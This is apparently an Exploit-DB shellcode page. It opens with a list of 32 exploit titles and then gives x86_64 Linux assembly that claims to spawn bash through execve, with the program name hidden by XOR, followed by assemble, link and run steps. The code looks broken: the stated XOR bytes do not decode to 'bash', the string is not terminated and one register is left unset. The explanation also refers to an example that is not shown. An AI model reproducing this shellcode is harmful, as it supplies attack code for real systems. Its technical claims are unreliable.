d46ab98863
32 changes to exploits/shellcodes/ghdb Answerdev 1.0.3 - Account Takeover D-Link DIR-846 - Remote Command Execution (RCE) vulnerability Dell EMC Networking PC5500 firmware versions 4.1.0.22 and Cisco Sx / SMB - Information Disclosure SOUND4 LinkAndShare Transmitter 1.1.2 - Format String Stack Buffer Overflow ERPNext 12.29 - Cross-Site Scripting (XSS) Liferay Portal 6.2.5 - Insecure Permissions GNU screen v4.9.0 - Privilege Escalation Apache Tomcat 10.1 - Denial Of Service PostgreSQL 9.6.1 - Remote Code Execution (RCE) (Authenticated) BTCPay Server v1.7.4 - HTML Injection. Provide Server v.14.4 XSS - CSRF & Remote Code Execution (RCE) Secure Web Gateway 10.2.11 - Cross-Site Scripting (XSS) ImageMagick 7.1.0-49 - DoS bgERP v22.31 (Orlovets) - Cookie Session vulnerability & Cross-Site Scripting (XSS) Bus Pass Management System 1.0 - Stored Cross-Site Scripting (XSS) Calendar Event Multi View 1.4.07 - Unauthenticated Arbitrary Event Creation to Cross-Site Scripting (XSS) CKEditor 5 35.4.0 - Cross-Site Scripting (XSS) Control Web Panel 7 (CWP7) v0.9.8.1147 - Remote Code Execution (RCE) Froxlor 2.0.3 Stable - Remote Code Execution (RCE) ImageMagick 7.1.0-49 - Arbitrary File Read itech TrainSmart r1044 - SQL injection Online Eyewear Shop 1.0 - SQL Injection (Unauthenticated) PhotoShow 3.0 - Remote Code Execution projectSend r1605 - Remote Code Exectution RCE Responsive FileManager 9.9.5 - Remote Code Execution (RCE) zstore 6.6.0 - Cross-Site Scripting (XSS) Binwalk v2.3.2 - Remote Command Execution (RCE) XWorm Trojan 2.1 - Null Pointer Derefernce DoS Kardex Mlog MCC 5.7.12 - RCE (Remote Code Execution) Linux/x86_64 - bash Shellcode with xor encoding
68 lines
No EOL
2.1 KiB
Text
68 lines
No EOL
2.1 KiB
Text
Exploit Title: Linux/x86_64 - bash shellcode with xor encoding
|
|
Date: 05/02/2023
|
|
Exploit Author: Jeenika Anadani
|
|
Contact: https://twitter.com/cyber_jeeni
|
|
Category: Shellcode
|
|
Architectue: Linux x86_64
|
|
Shellcode Length: 71 Bytes
|
|
|
|
-----------------------
|
|
section .data
|
|
|
|
section .text
|
|
global _start
|
|
|
|
_start:
|
|
; set up argv and envp arrays for execve()
|
|
xor rax, rax
|
|
mov [rsp-8], rax
|
|
mov qword [rsp-16], 0x72613162 ; encrypted 'bash'
|
|
xor byte [rsp-16], 0x08
|
|
xor byte [rsp-15], 0x16
|
|
xor byte [rsp-14], 0x24
|
|
xor byte [rsp-13], 0x32
|
|
lea rdx, [rsp-16]
|
|
mov qword [rsp-24], rdx
|
|
mov qword [rsp-32], rdx
|
|
lea rdi, [rsp-32]
|
|
|
|
; call execve()
|
|
xor eax, eax
|
|
mov al, 59
|
|
syscall
|
|
|
|
; exit with status code 0
|
|
xor eax, eax
|
|
mov ebx, eax
|
|
mov al, 60
|
|
syscall
|
|
|
|
-----------
|
|
#### Explanation:
|
|
|
|
This code uses XOR encryption to obscure the name of the program being executed, `"bash"`. The XOR encryption key is `0x08162432`, which is applied to each byte of the string. The decryption is performed just before calling `execve`, so the program name is passed in its original form.
|
|
|
|
The rest of the code is the same as the previous example, making a system call to the `execve` function and then calling the `exit` syscall to terminate the process.
|
|
|
|
---------
|
|
### Compilation AND Execution:
|
|
|
|
To run the x86_64 assembly code on a Linux system, you need to assemble it into an executable file and then run the file. Here are the steps:
|
|
|
|
1. Save the code to a file with a `.asm` extension, for example `bash.asm`.
|
|
|
|
2. Assemble the code into an object file using an assembler, such as NASM:
|
|
`nasm -f elf64 -o bash.o bash.asm`
|
|
The `-f elf64` option specifies that the output format should be ELF64 (Executable and Linkable Format), and the `-o` option specifies the name of the output file, `bash.o`.
|
|
|
|
3. Link the object file to produce an executable file using the `ld` linker:
|
|
`ld -s -o bash bash.o`
|
|
The `-s` option removes the symbol table from the output file to make it smaller, and the `-o` option specifies the name of the output file, `bash`.
|
|
|
|
4. Make the file executable:
|
|
`chmod +x bash`
|
|
|
|
5. Finally, you can run the file:
|
|
`./bash`
|
|
|
|
--------------------- |